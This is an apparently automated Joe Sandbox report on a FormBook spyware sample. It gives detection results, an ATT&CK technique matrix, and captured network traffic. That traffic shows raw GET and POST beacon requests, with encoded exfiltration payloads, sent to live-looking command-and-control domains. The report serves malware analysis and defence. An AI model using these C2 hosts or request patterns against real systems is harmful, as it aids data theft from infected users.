Loading ...

Play interactive tourEdit tour

Analysis Report ACre0O2rKa.bin

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:229424
Start date:12.05.2020
Start time:14:16:20
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 13m 37s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:ACre0O2rKa.bin (renamed file extension from bin to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:20
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@22/6@8/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 57.2% (good quality ratio 53.1%)
  • Quality average: 72.6%
  • Quality standard deviation: 30.4%
HCA Information:
  • Successful, ratio: 94%
  • Number of executed functions: 104
  • Number of non-executed functions: 345
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 72.247.224.69, 8.248.133.254, 8.248.113.254, 8.248.117.254, 67.26.75.254, 8.248.135.254, 23.42.27.172
  • Excluded domains from analysis (whitelisted): e5684.g.akamaiedge.net, fs.microsoft.com, audownload.windowsupdate.nsatc.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, site-cdn.onenote.net.edgekey.net
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through Module Load1Registry Run Keys / Startup Folder1Process Injection512Masquerading1Credential Dumping1Virtualization/Sandbox Evasion2Remote File Copy1Email Collection1Data Encrypted1Standard Cryptographic Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExploitation for Client Execution1Port MonitorsAccessibility FeaturesSoftware Packing11Network SniffingProcess Discovery2Remote ServicesMan in the Browser1Exfiltration Over Other Network MediumRemote File Copy1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesGraphical User Interface1Accessibility FeaturesPath InterceptionVirtualization/Sandbox Evasion2Input CaptureSecurity Software Discovery221Windows Remote ManagementData from Local System1Automated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingProcess Injection512Credentials in FilesRemote System Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol13SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessDeobfuscate/Decode Files or Information1Account ManipulationFile and Directory Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information3Brute ForceSystem Information Discovery12Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exeAvira: detection malicious, Label: TR/Injector.jjaxf
Antivirus detection for sampleShow sources
Source: ACre0O2rKa.exeAvira: detection malicious, Label: TR/Injector.jjaxf
Multi AV Scanner detection for domain / URLShow sources
Source: http://www.molestuk.com/un/Virustotal: Detection: 7%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exeVirustotal: Detection: 74%Perma Link
Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exeReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted fileShow sources
Source: ACre0O2rKa.exeVirustotal: Detection: 74%Perma Link
Source: ACre0O2rKa.exeReversingLabs: Detection: 82%
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1132813542.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.643062677.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1111360868.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1111870462.0000000002C66000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.1079735303.0000000002B56000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: ACre0O2rKa.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 0.2.ACre0O2rKa.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 1.2.ACre0O2rKa.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 13.0.5jd0x8e0uzsd8l.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 20.0.5jd0x8e0uzsd8l.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 14.0.5jd0x8e0uzsd8l.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.5jd0x8e0uzsd8l.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 0.0.ACre0O2rKa.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 17.0.5jd0x8e0uzsd8l.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 14.2.5jd0x8e0uzsd8l.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.5jd0x8e0uzsd8l.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 17.2.5jd0x8e0uzsd8l.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 16.0.5jd0x8e0uzsd8l.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 1.0.ACre0O2rKa.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 4x nop then pop edi1_2_004140C3
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi3_2_003D40C3

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /un/?FlAXKZ=l6LFnp+km1quSDfZ52pjMt+mpe8a6/Plu1YIxmUUFqmKbrXpmQH/nh6AvQPYfwnZFddr&Zj=Q0GXBhexZ8l0 HTTP/1.1Host: www.transferas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=BbNiF8OZmcUXoGx97jwAL0Yq+M1uZNoYeKxNjPTk177moqQXSalD+Nu5YzJHjuOZjPRG HTTP/1.1Host: www.websitenhatrang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /un/?FlAXKZ=FOOtQ47hxgivzhxjr6h1MB4NVmrbwUaO2ECBjx9yvE+swNR50NzcZ+CMbkeeVfoV1zfJ&Zj=Q0GXBhexZ8l0 HTTP/1.1Host: www.travelbytravant.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=7biYcUKhaRccwNcCc46fPF0jINvQjsFEYDcnDnJGupRrwRyvJO/A57AYTW9xJbMK+XXE HTTP/1.1Host: www.starsaunainstallations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 209.99.64.55 209.99.64.55
Source: Joe Sandbox ViewIP Address: 23.20.239.12 23.20.239.12
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /un/ HTTP/1.1Host: www.websitenhatrang.comConnection: closeContent-Length: 190296Cache-Control: no-cacheOrigin: http://www.websitenhatrang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.websitenhatrang.com/un/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 6c 41 58 4b 5a 3d 4a 35 42 59 62 62 76 4f 6c 70 46 76 39 68 34 57 73 47 78 37 54 68 4d 36 36 5a 6f 39 66 65 6c 5a 62 73 63 46 6c 64 62 76 7a 35 62 46 70 36 49 4d 62 5a 59 62 75 4a 28 44 48 69 74 64 38 65 57 75 68 35 77 43 44 41 42 4b 36 65 4f 49 4d 43 4e 66 36 76 32 68 73 35 46 78 6a 5f 6f 58 56 39 4e 4d 34 48 4a 35 33 53 7e 36 31 6a 56 6c 55 65 74 5a 6f 75 46 65 32 58 32 62 54 58 72 49 41 49 79 6a 43 43 6d 55 79 47 33 71 74 38 6b 35 6c 2d 70 6a 70 69 6a 38 79 7a 63 36 64 7a 69 61 74 67 7e 49 6d 56 50 76 53 49 70 56 6c 51 48 4a 58 63 58 73 42 67 6e 4e 28 6e 6c 73 6f 74 77 49 6d 45 76 31 6e 69 59 57 39 71 77 63 38 63 6d 47 76 58 4f 4e 39 6f 59 78 63 4a 44 77 36 31 58 65 32 4b 69 6e 37 4e 7a 33 74 6c 4d 36 6c 59 38 30 48 64 4a 79 59 43 35 6a 74 72 62 71 36 6c 52 48 28 68 38 50 76 37 67 37 44 65 53 42 46 35 31 76 37 59 44 42 68 57 61 79 6f 45 5a 73 33 41 42 68 45 69 50 79 6d 78 39 69 43 4c 74 52 70 41 6e 79 62 78 7e 38 39 64 6d 6a 32 77 28 56 53 49 58 64 7e 4e 62 65 37 70 69 31 70 79 6c 62 34 51 58 6e 63 37 79 59 67 41 67 63 43 2d 4c 63 57 36 53 55 71 70 49 69 56 74 31 49 35 51 39 77 62 6e 71 58 73 77 42 54 55 66 4c 67 66 71 53 42 53 6a 4e 33 61 4d 4e 58 42 47 5a 66 33 61 31 6a 41 71 55 54 4a 4f 48 55 7e 58 57 50 43 35 7a 54 72 67 75 55 32 6f 4a 7a 43 2d 31 7a 52 4b 41 76 72 50 7a 54 70 73 63 72 31 41 6f 59 30 53 7e 32 62 6b 31 6d 6c 6a 78 33 30 34 75 4a 34 30 6c 71 69 78 43 64 5a 6f 67 4a 6b 77 53 36 52 58 36 48 62 4e 7e 50 6e 66 68 65 54 6a 77 70 35 67 49 4b 71 31 66 4e 58 43 78 31 53 6c 6f 77 61 61 6d 4e 4f 54 56 2d 35 4d 55 4b 52 77 6e 62 4a 5a 44 63 6b 46 64 33 31 54 77 6b 76 6a 50 53 56 6e 38 36 67 66 6d 67 59 59 57 65 7a 66 75 4e 62 4c 59 6b 6b 4f 62 5f 4e 74 30 75 61 35 46 69 34 32 6b 35 5a 30 44 41 54 68 32 66 4d 6f 35 42 48 4a 36 31 57 63 78 47 68 64 72 78 38 69 57 6e 58 32 45 79 5a 35 6a 53 30 30 32 6c 33 49 42 62 6b 37 57 54 77 30 32 4a 4f 52 49 68 6f 32 46 6b 5a 41 75 4b 33 62 33 4f 39 57 69 56 35 69 4b 66 4a 38 43 2d 6b 4d 33 62 35 36 73 4c 65 50 72 71 6c 50 65 34 32 39 74 6d 55 59 57 32 4e 59 30 73 5a 71 78 31 6a 61 59 5f 5a 34 78 46 53 5f 32 35 4e 6a 55 55 73 35 7a 61 76 52 6e 5a 30 70 53 55 76 4e 58 76 4a 31 46 45 42 34 43 4c 34 78 51 4b 4f 55 6c 31 47 53 6e 4f 38 5a 73 5a 75 31 61 37 53 72 56 4d 54 58 59 4a 46 44 31 6e 79 6d 63 4b 48 69 67 47 79 37 64 6c 28 59 39 5f 6b 72 44 4f 64 44 56 61 38 4a 58 55 6d 58 31 74 65 38 42 38 49 51 49 45 4e 47 35 4e 4e 34 75 44 71 59 7a 62 6c 73 58 56 44 4c 63 45 74 78 35 41 4b 6a 36 6e 65 31 58 6a 42 73 56 31 6d 31 31 71 59 52 73 59 58 74 6c 48 55 6d 61 56 4a 58 76 4b 44 39 7a 61 75
Source: global trafficHTTP traffic detected: POST /un/ HTTP/1.1Host: www.travelbytravant.comConnection: closeContent-Length: 190296Cache-Control: no-cacheOrigin: http://www.travelbytravant.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.travelbytravant.com/un/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 6c 41 58 4b 5a 3d 4e 73 43 58 4f 66 4b 62 79 45 48 4d 6e 41 67 36 35 50 77 79 66 31 34 79 52 32 37 4e 6e 47 4b 35 77 51 4c 6a 7a 68 59 73 28 78 28 72 67 38 41 70 33 65 47 5f 61 4b 54 43 4f 33 61 43 55 50 73 53 78 44 32 4d 32 76 59 70 50 65 4a 77 7e 34 6d 44 6e 63 58 44 32 66 38 76 54 55 66 77 69 31 75 64 7a 48 6b 2d 4b 6b 77 68 5a 35 46 50 46 6b 62 73 7a 41 33 4e 68 30 62 33 57 34 64 67 76 38 6f 50 53 6a 72 35 50 53 7a 4e 4c 4e 53 33 6c 5f 5a 61 35 35 75 42 47 5a 64 4f 45 66 49 4e 6f 38 32 41 30 48 4e 37 49 62 73 5f 4c 58 50 4e 5a 35 50 68 68 39 67 6b 71 54 4e 41 6b 69 54 32 4d 4a 42 78 74 30 51 6f 70 7a 55 69 74 6c 73 35 5a 46 43 66 43 45 56 62 76 73 38 54 28 37 6f 72 46 74 72 42 4a 32 71 51 32 52 66 45 28 33 30 79 47 49 61 5a 36 63 35 38 7a 35 28 43 4e 63 51 44 53 31 55 52 33 43 32 65 6c 61 50 66 6f 6b 7e 39 4a 36 6f 43 36 61 45 79 6c 4f 61 32 72 4b 7a 62 68 5a 4a 32 75 45 63 6a 4b 6b 33 65 5a 69 50 6a 48 52 4d 72 61 61 66 33 4a 5f 31 30 58 5a 6d 62 63 73 73 62 37 79 70 7a 42 45 52 65 33 4c 72 42 6d 4f 53 64 36 46 28 38 6a 55 38 4d 35 31 37 44 28 39 59 31 43 47 38 44 32 6d 68 32 37 53 33 45 58 68 4d 44 55 54 31 6c 79 45 7a 36 65 34 47 79 6f 68 72 38 4c 69 59 4d 30 67 7a 50 75 4c 4b 4a 72 36 64 4c 4d 59 59 67 6b 67 42 6e 50 5f 63 2d 70 77 4e 53 63 47 4a 37 41 46 57 55 4c 36 45 43 4d 38 4e 53 6c 36 63 43 68 5f 64 54 6b 34 34 47 56 5f 4e 71 46 39 6b 52 41 30 4f 5a 35 50 4e 2d 5a 55 45 4f 64 5a 38 4e 34 55 36 6d 28 30 7a 5f 65 75 73 2d 71 34 43 5a 59 58 48 4a 46 6a 41 59 78 49 45 51 72 62 39 66 37 37 6b 4a 30 56 72 4a 5a 75 57 51 30 37 77 44 66 31 34 49 53 59 47 73 57 75 4a 7a 69 35 7a 34 50 77 46 50 71 76 57 46 78 52 6f 41 62 56 50 78 31 6b 55 75 4a 47 4d 50 4f 6f 6a 78 30 6b 4c 69 59 65 58 6e 6b 4c 79 68 28 44 62 6d 4c 66 43 37 77 32 68 4c 70 74 52 4e 71 5f 42 39 79 6a 72 53 7a 65 32 51 43 65 75 67 6a 35 30 6c 5a 4d 32 35 47 44 7e 44 59 57 4d 6b 50 76 4a 56 47 4b 68 55 6c 6a 57 45 4e 41 63 2d 31 6d 78 72 66 63 44 70 5a 42 74 52 34 6a 78 53 75 70 78 68 45 33 32 4c 79 59 77 70 75 33 44 51 44 65 57 75 4d 65 4e 36 62 45 50 56 6e 72 6d 55 79 64 57 41 6f 6d 34 30 5a 6d 56 53 50 47 6f 2d 41 6d 5a 46 64 50 62 47 68 32 53 53 7e 6d 4f 47 59 32 37 45 4c 72 6d 70 52 71 7e 45 77 4b 6f 35 4c 79 72 2d 50 35 7a 2d 50 4a 5a 49 50 56 52 72 30 6a 4c 36 4b 56 73 74 68 42 41 45 6e 72 4f 76 43 77 69 50 75 4b 76 35 57 4a 37 6d 75 75 74 79 71 56 51 67 7a 50 72 4e 66 45 46 42 7a 51 61 48 77 59 28 47 6f 32 6d 30 52 68 51 71 70 39 28 32 43 39 54 30 66 65 44 45 4b 44 55 66 70 72 51 56 47 79 4d 53 6f 53 67 72 49 42 4f 33 32 63 68 54 67 6d 43 59 48 47 6b 65 56
Source: global trafficHTTP traffic detected: POST /un/ HTTP/1.1Host: www.starsaunainstallations.comConnection: closeContent-Length: 190296Cache-Control: no-cacheOrigin: http://www.starsaunainstallations.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.starsaunainstallations.com/un/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 6c 41 58 4b 5a 3d 7a 35 75 69 43 30 28 32 51 55 6c 4a 6a 75 31 62 49 65 28 53 5a 68 41 36 4b 76 62 58 30 66 78 48 50 6d 6c 7a 48 6d 42 4f 35 6f 68 6f 34 53 28 31 42 74 75 44 79 4d 70 41 46 46 4a 75 46 59 55 79 36 6a 37 70 54 50 54 46 59 79 70 54 4a 75 77 6d 4d 65 6c 49 74 37 5a 38 55 51 6a 76 50 79 36 5a 47 6c 43 53 59 75 68 5f 71 5f 37 37 4b 74 6c 6b 28 42 33 53 48 4c 79 32 44 7a 62 4c 30 45 45 63 42 48 57 6c 28 66 79 77 62 4e 35 6b 4a 71 50 75 68 63 30 7a 63 6d 6b 66 37 6f 4f 55 6e 4c 56 4f 6a 70 72 73 72 7a 42 78 74 46 74 77 4b 6a 76 5a 48 54 39 52 54 75 43 65 48 48 51 2d 28 68 4a 37 30 74 37 57 6b 75 71 30 6f 62 44 46 69 6b 52 36 41 33 41 33 52 37 46 75 47 65 42 52 73 37 7a 4c 6f 6c 55 77 6e 52 6e 63 72 67 4f 57 72 72 28 51 5a 30 67 6c 48 37 31 64 7a 49 6c 72 4d 37 71 73 78 61 5a 6f 56 37 36 78 52 4e 67 46 4c 4c 58 52 35 2d 6c 33 55 39 4e 37 54 45 64 7a 34 63 58 34 34 67 74 71 65 39 73 32 47 71 64 50 59 72 75 37 7a 64 7a 5a 67 49 44 51 76 48 31 4d 48 57 76 59 7a 57 6f 39 4a 67 38 48 35 2d 4c 52 65 34 63 4d 55 73 61 79 4b 58 36 77 4c 75 53 77 30 38 4a 48 78 4b 32 50 4e 30 6c 4b 53 4a 76 59 35 6b 6a 48 4d 71 67 4b 7e 56 41 4e 47 31 57 47 49 47 67 61 7a 34 70 50 75 67 53 59 4a 47 7a 51 66 54 56 5a 6a 6b 34 4b 7e 41 46 76 4b 41 59 54 6c 35 72 55 30 34 38 55 34 33 34 5a 4e 36 48 75 28 66 53 39 63 49 6c 46 54 43 28 45 72 4a 52 74 61 47 71 6e 51 37 4b 36 64 55 79 47 28 78 55 73 31 79 61 77 61 41 28 4a 58 52 75 69 33 37 51 4b 68 4e 59 5a 76 32 4c 6b 31 6a 75 4f 41 6b 49 6e 4a 56 47 33 51 79 4d 6e 75 57 66 41 76 43 6d 70 70 67 4f 6b 30 4a 51 43 53 36 7e 70 63 61 64 4a 6a 32 34 6f 43 6c 6b 6d 32 44 34 45 68 66 4b 49 58 6b 51 75 69 62 66 68 47 75 41 2d 53 54 62 52 63 51 62 76 52 69 30 53 37 4b 75 6f 4a 52 42 48 28 61 66 47 50 62 43 59 51 53 71 71 7a 74 55 41 6e 72 70 4e 73 63 4c 41 4a 4b 63 50 7e 33 74 54 31 69 53 53 51 48 44 52 5a 6b 56 57 4e 48 78 76 32 6c 6f 72 34 46 6b 41 66 2d 7a 79 65 63 6b 5a 78 72 6f 56 65 36 52 4d 42 6d 68 41 53 77 4a 61 37 6d 55 72 78 30 32 62 4f 44 4c 44 43 7a 58 46 61 52 53 76 6d 64 6b 6f 45 38 6f 64 41 52 35 6e 4c 7a 58 72 65 58 54 45 72 61 57 48 73 35 74 7a 44 56 72 67 32 48 77 4b 33 36 75 52 4c 47 4d 49 4b 50 52 37 61 6e 71 4c 6f 75 6c 4f 42 58 6e 51 34 67 4c 6b 66 78 54 6c 55 68 38 64 51 45 7e 6d 6f 4c 46 74 46 51 4b 6a 6e 2d 44 71 75 63 44 43 32 47 49 72 49 30 61 6c 4d 55 34 37 50 30 32 63 6b 68 71 36 33 46 54 61 45 37 55 38 63 43 4a 78 6c 63 32 68 6f 61 33 4c 69 47 6c 52 53 73 54 64 48 75 65 6a 70 58 73 32 74 66 71 47 31 42 7a 63 46 52 53 33 45 5a 55 49 48 41 41 59 56 63 46 55 52 76
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /un/?FlAXKZ=l6LFnp+km1quSDfZ52pjMt+mpe8a6/Plu1YIxmUUFqmKbrXpmQH/nh6AvQPYfwnZFddr&Zj=Q0GXBhexZ8l0 HTTP/1.1Host: www.transferas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=BbNiF8OZmcUXoGx97jwAL0Yq+M1uZNoYeKxNjPTk177moqQXSalD+Nu5YzJHjuOZjPRG HTTP/1.1Host: www.websitenhatrang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /un/?FlAXKZ=FOOtQ47hxgivzhxjr6h1MB4NVmrbwUaO2ECBjx9yvE+swNR50NzcZ+CMbkeeVfoV1zfJ&Zj=Q0GXBhexZ8l0 HTTP/1.1Host: www.travelbytravant.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /un/?Zj=Q0GXBhexZ8l0&FlAXKZ=7biYcUKhaRccwNcCc46fPF0jINvQjsFEYDcnDnJGupRrwRyvJO/A57AYTW9xJbMK+XXE HTTP/1.1Host: www.starsaunainstallations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: www.vrtravelers.net
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /un/ HTTP/1.1Host: www.websitenhatrang.comConnection: closeContent-Length: 190296Cache-Control: no-cacheOrigin: http://www.websitenhatrang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.websitenhatrang.com/un/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 6c 41 58 4b 5a 3d 4a 35 42 59 62 62 76 4f 6c 70 46 76 39 68 34 57 73 47 78 37 54 68 4d 36 36 5a 6f 39 66 65 6c 5a 62 73 63 46 6c 64 62 76 7a 35 62 46 70 36 49 4d 62 5a 59 62 75 4a 28 44 48 69 74 64 38 65 57 75 68 35 77 43 44 41 42 4b 36 65 4f 49 4d 43 4e 66 36 76 32 68 73 35 46 78 6a 5f 6f 58 56 39 4e 4d 34 48 4a 35 33 53 7e 36 31 6a 56 6c 55 65 74 5a 6f 75 46 65 32 58 32 62 54 58 72 49 41 49 79 6a 43 43 6d 55 79 47 33 71 74 38 6b 35 6c 2d 70 6a 70 69 6a 38 79 7a 63 36 64 7a 69 61 74 67 7e 49 6d 56 50 76 53 49 70 56 6c 51 48 4a 58 63 58 73 42 67 6e 4e 28 6e 